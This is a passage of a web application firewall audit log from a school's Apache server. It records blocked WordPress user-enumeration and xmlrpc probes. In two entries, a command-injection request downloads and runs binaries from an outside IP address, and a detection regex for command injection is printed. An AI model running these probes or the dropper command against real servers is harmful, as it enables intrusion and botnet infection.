Apache-HttpClient/4.5.13 (Java/11.0.26) --57109009-C-- demo.sayHello --57109009-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --57109009-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308858824028 5196 (- - -) Stopwatch2: 1746308858824028 5196; combined=3988, p1=530, p2=3244, p3=21, p4=26, p5=96, sr=135, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --57109009-Z-- --7e205c50-A-- [04/May/2025:04:48:07 +0700] aBaPF9sVQyl9V2B8Pt-tsQAAAFM 103.236.140.4 55240 103.236.140.4 8181 --7e205c50-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.242 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7e205c50-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e205c50-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746308887966978 3235 (- - -) Stopwatch2: 1746308887966978 3235; combined=1398, p1=517, p2=851, p3=0, p4=0, p5=30, sr=147, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e205c50-Z-- --620a254c-A-- [04/May/2025:04:48:11 +0700] aBaPG2JEE9ao5dcyYWnsowAAAI8 103.236.140.4 55244 103.236.140.4 8181 --620a254c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.34.242 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.34.242 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --620a254c-C-- demo.sayHello --620a254c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --620a254c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746308891502941 4134 (- - -) Stopwatch2: 1746308891502941 4134; combined=2877, p1=545, p2=2176, p3=18, p4=17, p5=70, sr=142, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --620a254c-Z-- --c362ee30-A-- [04/May/2025:05:07:54 +0700] aBaTumJEE9ao5dcyYWns3QAAAIY 103.236.140.4 55496 103.236.140.4 8181 --c362ee30-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c362ee30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c362ee30-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746310074417483 3397 (- - -) Stopwatch2: 1746310074417483 3397; combined=1443, p1=473, p2=937, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c362ee30-Z-- --8f9d4a1c-A-- [04/May/2025:05:08:04 +0700] aBaTxNsVQyl9V2B8Pt-tvQAAAE4 103.236.140.4 55500 103.236.140.4 8181 --8f9d4a1c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.54 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8f9d4a1c-C-- demo.sayHello --8f9d4a1c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f9d4a1c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746310084249222 6610 (- - -) Stopwatch2: 1746310084249222 6610; combined=4683, p1=625, p2=3799, p3=37, p4=36, p5=108, sr=129, sw=78, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f9d4a1c-Z-- --3a1cd32a-A-- [04/May/2025:05:08:16 +0700] aBaT0GJEE9ao5dcyYWns4AAAAIg 103.236.140.4 55506 103.236.140.4 8181 --3a1cd32a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.31 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3a1cd32a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a1cd32a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746310096886208 2910 (- - -) Stopwatch2: 1746310096886208 2910; combined=1269, p1=449, p2=790, p3=0, p4=0, p5=30, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a1cd32a-Z-- --99e16f46-A-- [04/May/2025:05:08:22 +0700] aBaT1mJEE9ao5dcyYWns4gAAAIs 103.236.140.4 55510 103.236.140.4 8181 --99e16f46-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.114.31 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.114.31 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --99e16f46-C-- demo.sayHello --99e16f46-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --99e16f46-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746310102759951 5662 (- - -) Stopwatch2: 1746310102759951 5662; combined=4191, p1=545, p2=3335, p3=29, p4=31, p5=139, sr=97, sw=112, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99e16f46-Z-- --00438968-A-- [04/May/2025:05:08:39 +0700] aBaT52JEE9ao5dcyYWns5AAAAI0 103.236.140.4 55514 103.236.140.4 8181 --00438968-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.224 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --00438968-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00438968-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746310119515660 3088 (- - -) Stopwatch2: 1746310119515660 3088; combined=1290, p1=432, p2=823, p3=0, p4=0, p5=35, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00438968-Z-- --0d1a3632-A-- [04/May/2025:05:08:45 +0700] aBaT7WJEE9ao5dcyYWns5gAAAI8 103.236.140.4 55518 103.236.140.4 8181 --0d1a3632-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.224 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.224 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0d1a3632-C-- demo.sayHello --0d1a3632-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d1a3632-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746310125638852 4360 (- - -) Stopwatch2: 1746310125638852 4360; combined=2989, p1=459, p2=2374, p3=26, p4=27, p5=62, sr=67, sw=41, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d1a3632-Z-- --fd573575-A-- [04/May/2025:05:15:37 +0700] aBaViechPF6irSergtv7KgAAANY 103.236.140.4 55608 103.236.140.4 8181 --fd573575-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --fd573575-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fd573575-E-- --fd573575-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746310537789210 2826 (- - -) Stopwatch2: 1746310537789210 2826; combined=847, p1=490, p2=311, p3=0, p4=0, p5=45, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd573575-Z-- --cb938649-A-- [04/May/2025:05:43:28 +0700] aBacEPnZiHJYHUAF8QfZlQAAAAA 103.236.140.4 55758 103.236.140.4 8181 --cb938649-B-- GET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+drea4+arm7;wget+http:/\/176.65.144.76/efefa7;chmod+777+efefa7;./efefa7+jaws;wget+http:/\/176.65.144.76/drea4;chmod+777+drea4;./drea4+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.218.84.39 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.218.84.39 X-Forwarded-Proto: http Connection: close Cache-Control: max-age=0 User-Agent: KrebsOnSecurity Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Language: en-US,en;q=0.9 --cb938649-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb938649-E-- --cb938649-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:killall -9 arm7;killall -9 arm4;killall -9 arm;killall -9 /bin/sh;killall -9 /bin/sh;killall -9 /z/bin;killall -9 /bin/bash;cd /tmp;rm drea4 arm7;wget http:/\x5c\x5c/176.65.144.76/efefa7;chmod 777 efefa7;./efefa7 jaws;wget http:/\x5c\x5c/176.65.144.76/drea4;chmod 777 drea4;./drea4 jaws: killall -9 arm7 killall -9 arm4 killall -9 arm killall -9/bin/sh killall -9/bin/sh killall -9/z/bin killall -9/bin/bash cd/tmp rm drea4 arm7 wget http://176.65.144.76/efefa7 chmod..."] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746312208770839 2476 (- - -) Stopwatch2: 1746312208770839 2476; combined=791, p1=486, p2=273, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb938649-Z-- --7a942e52-A-- [04/May/2025:05:49:08 +0700] aBadZOchPF6irSergtv7MgAAAM0 103.236.140.4 55800 103.236.140.4 8181 --7a942e52-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.1 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7a942e52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a942e52-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746312548906789 3363 (- - -) Stopwatch2: 1746312548906789 3363; combined=1444, p1=474, p2=938, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a942e52-Z-- --b1164f4f-A-- [04/May/2025:05:49:13 +0700] aBadaWJEE9ao5dcyYWntGwAAAI4 103.236.140.4 55804 103.236.140.4 8181 --b1164f4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.161.1 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.161.1 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b1164f4f-C-- demo.sayHello --b1164f4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b1164f4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746312553576451 3437 (- - -) Stopwatch2: 1746312553576451 3437; combined=2623, p1=330, p2=2143, p3=18, p4=18, p5=67, sr=50, sw=47, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b1164f4f-Z-- --da6c7570-A-- [04/May/2025:05:50:13 +0700] aBadpdsVQyl9V2B8Pt-tyAAAAEk 103.236.140.4 55814 103.236.140.4 8181 --da6c7570-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da6c7570-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da6c7570-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746312613763123 3143 (- - -) Stopwatch2: 1746312613763123 3143; combined=1322, p1=464, p2=828, p3=0, p4=0, p5=30, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da6c7570-Z-- --9515cf69-A-- [04/May/2025:05:50:21 +0700] aBadrdsVQyl9V2B8Pt-tyQAAAEg 103.236.140.4 55818 103.236.140.4 8181 --9515cf69-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9515cf69-C-- demo.sayHello --9515cf69-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9515cf69-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746312621785856 5316 (- - -) Stopwatch2: 1746312621785856 5316; combined=3981, p1=542, p2=3223, p3=22, p4=25, p5=98, sr=110, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9515cf69-Z-- --f3e36265-A-- [04/May/2025:06:11:56 +0700] aBaivGJEE9ao5dcyYWnuKAAAAIE 103.236.140.4 33904 103.236.140.4 8181 --f3e36265-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.157 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.157 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f3e36265-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3e36265-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] 